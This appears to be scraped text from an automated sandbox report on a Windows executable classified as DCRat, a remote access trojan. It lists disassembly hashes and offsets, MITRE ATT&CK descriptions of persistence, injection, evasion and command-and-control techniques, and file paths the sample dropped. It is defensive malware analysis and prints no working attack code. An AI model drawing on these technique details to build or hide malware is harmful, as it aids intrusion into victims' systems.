Instruction Fuzzy Hash: 65E08C31A2051E4BDB00EF88E844AEDB3B0FF94324F400236F818D32D5DAB9AA408B90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0C04 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1945557583.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bad0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction ID: 8da4bfe529b68b48c19ff1a96f1852166d247da8dc5dc6367f71543929a6604e
Opcode Fuzzy Hash: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction Fuzzy Hash: 8AE04F30E4B40F8AE730AB94C8745FE7370EF90711F018732C415822A5DEBC6241CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD114D Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1945557583.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bad0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction ID: ea56cff8cc1b034b8f9b1c69b962e1904011f97e0c19e7917a1893f5c8cbac10
Opcode Fuzzy Hash: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction Fuzzy Hash: 55E0EC34A0551ECFEB24EF80D8A49BE73B1FB94350F010B39D416D72A1DBB86608CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0BF5 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1945557583.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bad0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction ID: b786771f623dea01de2ef29ad20cbd318f2458d3d70c05b1e1db2a8c85565cc6
Opcode Fuzzy Hash: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction Fuzzy Hash: F2E01230E0640ACBE730DB94C8646FF7370EB90711F018326C81687295DA7CA645CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE8E7B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1945557583.00007FFD9BADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9badd000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcd958b559435731bad215bf4f7dacaed686b15c7d74fab1d6a87c9983658b27
Instruction ID: 3a34438295a6918782a32057eddea2786f78c6bfdce0ca7116e487753559a9fd
Opcode Fuzzy Hash: fcd958b559435731bad215bf4f7dacaed686b15c7d74fab1d6a87c9983658b27
Instruction Fuzzy Hash: E7D0C910B0F65F85F1794792513023D55A44F44320E66447DC55F418F1CDEDBF016242

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD1422 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1945557583.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bad0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aef18171ab84c5181462236fab73fa3715a1302b2cc2fc13804131cb53e0eda4
Instruction ID: 93523ee8ae4723620a6dd24c730ee27cf611b6f98af72905807d0b12c8b052bc
Opcode Fuzzy Hash: aef18171ab84c5181462236fab73fa3715a1302b2cc2fc13804131cb53e0eda4
Instruction Fuzzy Hash: B1C0CA70E09A2D9EEBA0DB988894BADB6F0AB59300F0102A6900CE2250DBB416C48B46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE7F8F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1945557583.00007FFD9BADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9badd000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff25dd1f970ad203897cc5953fd797ca8e136283bc16fbe2fc9585004ce5707c
Instruction ID: ed1767b634b73ad33f2cdbff30ea173f01ed7ccbfa3fd7fa81a3b025ae16664f
Opcode Fuzzy Hash: ff25dd1f970ad203897cc5953fd797ca8e136283bc16fbe2fc9585004ce5707c
Instruction Fuzzy Hash: C0C04840F0E28A5AEA3112E41DA507D06840F96200B5606B6E54A8A1E3EC8C6A499261

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD147E Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1945557583.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bad0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3bfdd0e236329f2dc260553f4b612bea235462995b01530acd1fbb714c54e41
Instruction ID: db00fa2c5d043582567e73bc27d4dbad38d081038660f1928912cb31f4306180
Opcode Fuzzy Hash: c3bfdd0e236329f2dc260553f4b612bea235462995b01530acd1fbb714c54e41
Instruction Fuzzy Hash: 1CB09220E1901E8AE7609B80D8606BE7260AF80704F010234E809A21A1CBB82A00C740

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9BAE86FA Relevance: 7.6, Strings: 6, Instructions: 83COMMON

Download Yara Rule

Strings

J_^=, xrefs: 00007FFD9BAE86FA
J_^o, xrefs: 00007FFD9BAE87C2
J_^g, xrefs: 00007FFD9BAE87A2
J_^], xrefs: 00007FFD9BAE877A
J_^q, xrefs: 00007FFD9BAE87C9
J_^C, xrefs: 00007FFD9BAE8712

Memory Dump Source

Source File: 00000012.00000002.1945557583.00007FFD9BADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9badd000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID: J_^=$J_^C$J_^]$J_^g$J_^o$J_^q
API String ID: 0-382580184
Opcode ID: 7797f068a22386a3ea3ca3edb7a7e03a9320d079e99bbdaeb89bb0669c09d49e
Instruction ID: a531ae1ae2989c57bf52f906b3551dd4bfd89d5ff43c1fde709ab5029100c895
Opcode Fuzzy Hash: 7797f068a22386a3ea3ca3edb7a7e03a9320d079e99bbdaeb89bb0669c09d49e
Instruction Fuzzy Hash: 092108B771893A059729BA6CBC154E93745CFA437EB0807F3EDBE8E0839D24244AC5C4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE86F8 Relevance: 6.3, Strings: 5, Instructions: 86COMMON

Download Yara Rule

Strings

J_^o, xrefs: 00007FFD9BAE87C2
J_^g, xrefs: 00007FFD9BAE87A2
J_^], xrefs: 00007FFD9BAE877A
J_^q, xrefs: 00007FFD9BAE87C9
J_^C, xrefs: 00007FFD9BAE8712

Memory Dump Source

Source File: 00000012.00000002.1945557583.00007FFD9BADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9badd000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID: J_^C$J_^]$J_^g$J_^o$J_^q
API String ID: 0-2869168094
Opcode ID: 4d60324f4fd870bcbcf8259ec4c8f3911d2f4b806e37fd42a3457f14cf7e571a
Instruction ID: 839e2409307fc1ce5dead050d703732603f84cb40c396fb4621d7f5252a6ea46
Opcode Fuzzy Hash: 4d60324f4fd870bcbcf8259ec4c8f3911d2f4b806e37fd42a3457f14cf7e571a
Instruction Fuzzy Hash: 3B21F37771883A059729BA6CBC258E93745DFA433FB0847B3E9AE8E0839D24244AC5D4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADB64D Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD9BADB4BB
X, xrefs: 00007FFD9BADB577
`, xrefs: 00007FFD9BADB6B5
Y, xrefs: 00007FFD9BADB6F0
u, xrefs: 00007FFD9BADB4AE

Memory Dump Source

Source File: 00000012.00000002.1945557583.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9badb000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID: H$X$Y$`$u
API String ID: 0-4051370763
Opcode ID: dc512274616ad9e13ea96468bd71fccd99380a66a5ae00913af67a458d923f45
Instruction ID: a9b1ee55834f73f1e980d4b2abea0045ec7ab5392549045ce198e87e0ee28acf
Opcode Fuzzy Hash: dc512274616ad9e13ea96468bd71fccd99380a66a5ae00913af67a458d923f45
Instruction Fuzzy Hash: 56419770E0A66D8FEBA4DF55C8987ADB6B1BF54305F1042EAD50DA72A1CB785E84CF00

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PMDfwr7Jal.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\PerfLogs\3716f76c5abe60cbe58a0468ebc9d97d1ca24960

C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe

C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\3716f76c5abe60cbe58a0468ebc9d97d1ca24960

C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe

C:\ProgramData\Adobe\3716f76c5abe60cbe58a0468ebc9d97d1ca24960

C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe

C:\Recovery\3716f76c5abe60cbe58a0468ebc9d97d1ca24960

C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ZyNSmFTtlPIEeiJBfofO.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dllhost.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\perfCrtmonitorsvcMonitorDll.exe.log

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe

Windows Analysis Report
PMDfwr7Jal.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre